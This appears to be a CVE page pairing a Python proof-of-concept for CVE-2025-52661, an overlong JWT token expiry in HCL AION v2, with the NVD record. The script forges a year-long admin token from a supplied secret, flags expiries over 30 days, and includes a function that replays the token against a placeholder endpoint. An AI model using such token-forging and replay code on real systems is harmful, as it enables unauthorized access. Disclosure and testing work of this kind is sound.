CVE-2025-52661

#!/usr/bin/env python3 """ CVE-2025-52661 PoC - HCL AION JWT Token Expiry Too Long Note: This is for educational and authorized testing purposes only. """ import jwt import datetime import requests import sys def generate_long_expiry_token(secret_key, user_claims): """ Generate a JWT token with extended expiry time This simulates the vulnerable token generation in HCL AION v2 """ # Vulnerable: Token expires in 365 days instead of short duration payload = { 'sub': user_claims.get('sub', 'unknown'), 'name': user_claims.get('name', 'unknown'), 'iat': datetime.datetime.utcnow(), 'exp': datetime.datetime.utcnow() + datetime.timedelta(days=365), # VULNERABLE: Too long 'roles': user_claims.get('roles', []) } token = jwt.encode(payload, secret_key, algorithm='HS256') return token def check_token_expiry(token, secret_key): """ Check the expiry time of a JWT token """ try: decoded = jwt.decode(token, secret_key, algorithms=['HS256']) exp_time = datetime.datetime.fromtimestamp(decoded['exp']) current_time = datetime.datetime.utcnow() time_diff = exp_time - current_time print(f"Token Subject: {decoded.get('sub')}") print(f"Token Expiry: {exp_time}") print(f"Time until expiry: {time_diff.days} days") # Check if expiry is too long (vulnerability indicator) if time_diff.days > 30: print("[!] VULNERABLE: Token expiry is too long (> 30 days)") return True else: print("[+] SECURE: Token expiry is within acceptable range") return False except jwt.ExpiredSignatureError: print("[-] Token has expired") return False except Exception as e: print(f"[-] Error decoding token: {e}") return False def simulate_token_misuse(token, target_url): """ Simulate unauthorized access using the long-lived token """ headers = { 'Authorization': f'Bearer {token}', 'Content-Type': 'application/json' } try: response = requests.get(target_url, headers=headers, timeout=10) print(f"[*] Request to {target_url}") print(f"[*] Response Status: {response.status_code}") if response.status_code == 200: print("[!] Successfully authenticated with long-lived token") print("[!] This demonstrates the risk of extended token validity") return True else: print(f"[-] Request failed: {response.text}") return False except requests.exceptions.RequestException as e: print(f"[-] Request error: {e}") return False if __name__ == "__main__": print("=" * 60) print("CVE-2025-52661 PoC - HCL AION JWT Token Expiry Vulnerability") print("=" * 60) # Configuration SECRET_KEY = "your_secret_key_here" # Replace with actual secret TARGET_URL = "https://target-aion-instance/api/protected-endpoint" # Simulate token generation with long expiry user_claims = { 'sub': 'admin_user', 'name': 'Admin User', 'roles': ['admin', 'user'] } print("\n[*] Generating JWT token with extended expiry...") token = generate_long_expiry_token(SECRET_KEY, user_claims) print(f"[*] Generated Token: {token[:50]}...") print("\n[*] Analyzing token expiry...") is_vulnerable = check_token_expiry(token, SECRET_KEY) if is_vulnerable: print("\n[!] VULNERABILITY CONFIRMED:") print(" - Token has extended validity period") print(" - Increased risk of token misuse if compromised") print(" - Attacker has larger time window for exploitation")

{"cve": {"id": "CVE-2025-52661", "sourceIdentifier": "[email protected]", "published": "2026-01-19T18:16:03.933", "lastModified": "2026-04-25T18:04:38.990", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL AION version 2 is affected by a JWT Token Expiry Too Long vulnerability. This may increase the risk of token misuse, potentially resulting in unauthorized access if the token is compromised."}, {"lang": "es", "value": "HCL AION versión 2 está afectada por una vulnerabilidad de JWT Token Expiry Too Long. Esto puede aumentar el riesgo de uso indebido del token, lo que podría resultar en acceso no autorizado si el token se ve comprometido."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N", "baseScore": 2.4, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.9, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-613"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcltech:aion:2.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "BEBB7E38-04AE-436B-8F21-65FF3CA3CECC"}]}]}], "references": [{"url": "https://support.hcl-software.com/kb_view.do?sys_kb_id=4b92474633de7ad4159a05273e5c7b4b&searchTerm=kb0127995#", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}